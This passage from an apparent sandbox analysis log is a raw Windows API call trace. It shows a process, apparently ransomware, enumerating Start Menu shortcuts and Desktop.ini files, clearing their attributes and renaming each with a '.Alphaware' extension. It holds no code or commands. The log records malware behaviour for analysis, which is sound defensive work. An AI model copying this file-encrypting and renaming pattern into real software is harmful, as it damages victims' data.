ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8ddcb740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x788, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk.Alphaware", cAlternateFileName="COMMAN~1.ALP")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8de3db60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8de89e20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk.Alphaware", cAlternateFileName="NOTEPA~1.ALP")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ddcb740, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8ddcb740, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8ddcb740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8ded60e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk.Alphaware", cAlternateFileName="RUNLNK~1.ALP")) returned 1 [0100.250] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7c750, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8df223a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk.Alphaware", cAlternateFileName="WINDOW~1.ALP")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8df223a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk.Alphaware", cAlternateFileName="WINDOW~1.ALP")) returned 0 [0100.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0100.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0100.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e650 | out: lpFindFileData=0x23e650*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e650 | out: lpFindFileData=0x23e650*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e650 | out: lpFindFileData=0x23e650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e650 | out: lpFindFileData=0x23e650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e650 | out: lpFindFileData=0x23e650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0100.251] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e650 | out: lpFindFileData=0x23e650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0100.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e578) returned 1 [0100.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0100.252] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini", dwFileAttributes=0x80) returned 1 [0100.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e638) returned 1 [0100.253] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x258ed70 | out: lpFileInformation=0x258ed70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0)) returned 1 [0100.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5e8) returned 1 [0100.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6c8) returned 1 [0100.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e638) returned 1 [0100.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e5f8) returned 1 [0100.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e568) returned 1 [0100.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e568) returned 1 [0100.283] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8df947c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x488)) returned 1 [0100.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e518) returned 1 [0100.283] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.alphaware")) returned 1 [0100.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e688) returned 1 [0100.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5f8) returned 1 [0100.289] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk", dwFileAttributes=0x80) returned 1 [0100.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e638) returned 1 [0100.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2413c70 | out: lpFileInformation=0x2413c70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e)) returned 1 [0100.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5e8) returned 1 [0100.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6c8) returned 1 [0100.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e638) returned 1 [0100.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e5f8) returned 1 [0100.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e568) returned 1 [0100.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e568) returned 1 [0100.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dfe0a80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x7e0)) returned 1 [0100.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e518) returned 1 [0100.318] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.alphaware")) returned 1 [0100.320] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk", dwFileAttributes=0x80) returned 1 [0100.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e638) returned 1 [0100.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2497158 | out: lpFileInformation=0x2497158*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea)) returned 1 [0100.352] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e02cd40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0100.352] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.alphaware")) returned 1 [0100.354] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk", dwFileAttributes=0x80) returned 1 [0100.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2519aa8 | out: lpFileInformation=0x2519aa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee)) returned 1 [0100.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e079000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0100.382] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.alphaware")) returned 1 [0100.385] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk", dwFileAttributes=0x80) returned 1 [0100.386] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), fInfoLevelId=0x0, lpFileInformation=0x259c420 | out: lpFileInformation=0x259c420*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2)) returned 1 [0100.424] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e0eb420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0100.424] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.alphaware")) returned 1 [0100.426] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk", dwFileAttributes=0x80) returned 1 [0100.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2420360 | out: lpFileInformation=0x2420360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106)) returned 1 [0100.457] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e111580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234)) returned 1 [0100.457] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.alphaware")) returned 1 [0100.462] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk", dwFileAttributes=0x80) returned 1 [0100.463] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24a3cd8 | out: lpFileInformation=0x24a3cd8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106)) returned 1 [0100.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e890 | out: lpFileInformation=0x23e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8e1839a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234)) returned 1 [0100.490] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.alphaware")) returned 1 [0100.492] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini", dwFileAttributes=0x80) returned 1 [0100.493] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2524298 | out: lpFileInformation=0x2524298*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, 